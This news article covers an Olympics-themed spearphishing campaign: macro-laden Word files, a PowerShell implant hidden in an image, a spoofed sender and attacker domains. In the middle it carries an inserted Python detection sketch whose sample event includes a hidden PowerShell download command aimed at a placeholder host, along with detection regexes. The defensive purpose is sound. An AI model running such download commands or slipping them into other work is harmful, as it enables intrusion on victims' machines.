The opening ceremony for the Pyeongchang Winter Olympics in South Korea is still a month away, but cyber-criminals have already started using it as part of their social engineering plans in several phishing attacks aimed at groups involved with the games.
The attack centres around emails containing malicious Word documents, but a McAfee Advanced Threat Research report shows how much thought the threat actors are putting into the attack that, if successful, will give the attacker the ability to execute commands on the victim's computer. This includes the ability to install additional malware.
The first incident took place on 22 December, with the last known message arriving on 28 December. The initial email was addressed to icehockey@pyeongchang2018[.]com, with several other organisations that play some type of support or infrastructure role in the Olympics blind-copied. The email was sent from an IP address in Singapore and was spoofed to appear to come from the South Korean National Counter-Terrorism Center, which at the time was running counter-terrorism drills for the Olympics.
“From a hacker's perspective, the Olympics are a perfect target. With so many people and so much technology assembled so quickly and working under onerous deadlines, the likelihood for security lapses is high,” said Mark Orlando, CTO of Cyber Services for Raytheon.
Orlando added that the attack itself is a textbook spearphishing campaign. “The hackers are targeting the people on the periphery of the games, pelting them with exactly the kinds of emails they're likely to open and hoping to get access to bigger organisations and more valuable data,” he said.
“The attackers originally embedded an implant into the malicious document as a hypertext application (HTA) file, and then quickly moved to hide it in an image on a remote server and used obfuscated Visual Basic macros to launch the decoder script. They also wrote custom PowerShell code to decode the hidden image and reveal the implant,” a spokesperson for McAfee said.
When the recipient makes the mistake of enabling the macro, a PowerShell script is launched. The script then downloads and reads an image file and “carves out a hidden PowerShell implant script embedded within the image file to execute.” The steganography tool embeds the script in the image's pixel data, which hides the malicious code from a casual look at the file.
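The chain described above (Office document → macro → script host → remote image fetch, with an HTA variant in the earlier samples) leaves a recognisable parent/child pattern in process-creation telemetry. The following detection sketch is added here for illustration and is not code from the article or the McAfee report; the event fields mimic Sysmon-style process-creation records, and the sample events and placeholder domain are constructed.

```python
import re

# Constructed sample events (not real telemetry). Event 0 mirrors the article's
# chain: Word spawns hidden PowerShell that fetches a remote image. Event 1 is
# benign admin scripting. Event 2 is the HTA variant the report also mentions.
SAMPLE_EVENTS = [
    {"ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -nop -w hidden -c (New-Object Net.WebClient)"
                    ".DownloadFile('http://placeholder.example/logo.png','C:/Temp/logo.png')"},
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -ExecutionPolicy RemoteSigned -File C:/scripts/backup.ps1"},
    {"ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "Image": r"C:\Windows\System32\mshta.exe",
     "CommandLine": r"mshta.exe C:\Users\u\AppData\Local\Temp\page.hta"},
]

OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "mshta.exe", "wscript.exe", "cscript.exe"}
DOWNLOAD_RE = re.compile(r"downloadstring|downloadfile|invoke-webrequest|net\.webclient|bitstransfer", re.I)
IMAGE_URL_RE = re.compile(r"https?://\S+\.(png|jpe?g|gif|bmp)\b", re.I)
HIDDEN_RE = re.compile(r"-w(indowstyle)?\s+hidden|-e(nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}|-nop\b|-ep\s+bypass", re.I)


def basename(path):
    """Lower-cased file name from a Windows or POSIX path."""
    return re.split(r"[\\/]", path)[-1].lower()


def score_event(ev):
    """Return the list of indicators an event matches, in a fixed order."""
    reasons = []
    if basename(ev["ParentImage"]) in OFFICE_PARENTS and basename(ev["Image"]) in SCRIPT_HOSTS:
        reasons.append("office-spawned-script-host")
    cl = ev["CommandLine"]
    if DOWNLOAD_RE.search(cl):
        reasons.append("web-download")
    if IMAGE_URL_RE.search(cl):
        reasons.append("image-url-fetch")
    if HIDDEN_RE.search(cl):
        reasons.append("hidden-or-encoded")
    return reasons


def triage(events):
    """Alert only on the Office -> script-host chain; other indicators add context."""
    return [(basename(ev["Image"]), score_event(ev))
            for ev in events if "office-spawned-script-host" in score_event(ev)]
```

Alerting on the parent/child chain alone keeps the rule robust to command-line obfuscation, while the extra indicators help an analyst prioritise which hit to look at first.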
Once this completes, the attacker has an encrypted channel from the victim to the attacker's server, most likely giving them the ability to execute code and install additional malware.

The McAfee research found an IP address in an Apache server log connected to a URL located in South Korea, along with another that links to a server in Costa Rica that resolves to mafra.go.kr.jeojang.ga. The domain jeojang.ga was registered via Freenom, a free anonymous domain provider. The attacker appears to be reusing the name of a domain belonging to the South Korean Ministry of Agriculture and Forestry as a subdomain, which is in line with the name of the document attached to the email, but this domain has nothing to do with that government agency.
It is expected that, as the Olympics approach, the number of Olympics-related cyber-attacks will rise.